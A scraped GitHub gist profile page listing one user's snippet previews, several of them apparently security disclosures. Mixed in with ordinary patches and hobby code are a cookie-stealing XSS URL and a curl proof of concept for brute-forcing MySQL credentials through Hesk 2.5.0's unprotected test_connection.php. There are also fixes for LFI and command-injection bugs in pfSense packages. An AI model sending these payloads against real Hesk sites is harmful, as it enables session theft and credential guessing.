Skip to content

Instantly share code, notes, and snippets.

Avatar
🐗
æ

cedric cedriczirtacic

🐗
æ
View GitHub Profile
@cedriczirtacic
cedriczirtacic / paytv.pl
Created Apr 8, 2014
Hacklu-2013 CTF - PayTV-200
View paytv.pl
#!/usr/bin/perl -w
# Pay TV (Category: Web) Author(s): qll, tangled
# These robo-friends were shocked to see that they had to pay to watch the news
# broadcast about the “Oktoberfest”. Can you help them?
# Here is your challenge: https://ctf.fluxfingers.net:1316/
#use strict;
use warnings;
use LWP::UserAgent;
use Data::Dumper;
View Hesk 2.5.0 XSS example
http://www.victim.com/ticket.php?track='),alert(document.cookie);//?&Refresh=36528&f=1
@cedriczirtacic
cedriczirtacic / attack
Last active Aug 29, 2015
Hesk 2.5.0 URL Redirection
View attack
HTTP/1.1 200 OK
Server: test
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Aug 2014 14:42:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 13
<h1>TEST</h1>
@cedriczirtacic
cedriczirtacic / gist:c32e8e4348b216c8d555
Created Aug 6, 2014
Hesk 2.5.0 Connection Brute Force
View gist:c32e8e4348b216c8d555
(*) There isn't an access control in the file test_connection.php, which performs tests for MySQL connections (also POP3 and SMTP). This can give an attacker the opportunity to perform a dictionary bruteforce attack and check every possible combination of username/password and/or databases without having the need to make a real connection to the MySQL service.
(*) proof-of-concept:
curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed
Where USERNAME, PASSWORD and DATABASE are parameters to bruteforce.
@cedriczirtacic
cedriczirtacic / puppet-dashboard.patch
Created Mar 19, 2015
More comprehensive restart for puppet-dashboard
View puppet-dashboard.patch
--- /etc/init.d/puppet-dashboard.old 2015-03-19 11:36:46.000000000 -0300
+++ /etc/init.d/puppet-dashboard 2015-03-19 11:39:45.000000000 -0300
@@ -78,7 +78,13 @@
restart () {
stop
- start
+ RETVAL=$?
+ if [ $? -gt 0 ];then
+ return $RETVAL
View boxing_timer.ino
// Simple boxing timer
// turn on debug strings
#define DEBUG true
// leds
int pingreen = 13;
int pinred = 11;
// buzzer
int pinbuzz = 12;
@cedriczirtacic
cedriczirtacic / gist:7459317
Created Nov 14, 2013
Quick way to get current battery status (tested on Fedora 18).
View gist:7459317
( cd /sys/class/power_supply/BAT1/ && perl -e "printf(\"%%%d\n\",(( "`cat charge_now`" / "`cat charge_full`" ) * 100));" )
@cedriczirtacic
cedriczirtacic / webmin_postgresql_backup_compress.patch
Created Dec 18, 2013
Patch for webmin's postgresql backup script to enable gzip/bzip2 compression.
View webmin_postgresql_backup_compress.patch
--- postgresql/backup.pl.old 2013-12-17 14:50:06.000000000 -0300
+++ postgresql/backup.pl 2013-12-17 16:25:52.000000000 -0300
@@ -2,6 +2,7 @@
# backup.pl
# Called by cron to backup a database
+my $compress;
$no_acl_check++;
require './postgresql-lib.pl';
@cedriczirtacic
cedriczirtacic / sarg_pfsense_0.6.10_LFI.patch
Created Mar 11, 2016
Fix for Local File Inclusion (CWE-98) on sarg 0.6.10 pfSense package
View sarg_pfsense_0.6.10_LFI.patch
--- sarg_frame.php.old 2016-03-11 14:25:58.000000000 -0300
+++ sarg_frame.php 2016-03-11 16:09:53.000000000 -0300
@@ -34,6 +34,11 @@
ini_set('memory_limit', '250M');
}
+// Small security check
+if(!empty($_REQUEST['file'])){
+ $_REQUEST['file']=preg_replace('/(\.+\/|\\\.*|\/{2,})*/',"", $_REQUEST['file']);
+}
@cedriczirtacic
cedriczirtacic / squidguard_pfsense_1.4._7_RCE.patch
Last active May 4, 2016
Fix for Remote Code Execution (CWE-78) on squidGuard 1.4_7 pfSense package
View squidguard_pfsense_1.4._7_RCE.patch
--- squidguard_blacklist.php.old 2016-05-04 15:01:08.000000000 -0300
+++ squidguard_blacklist.php 2016-05-04 15:46:13.000000000 -0300
@@ -58,11 +58,19 @@
function squidguard_blacklist_AJAX_response( $request )
{
$res = '';
+ $status = '';
$sz = 0;
$pcaption = '&nbsp;';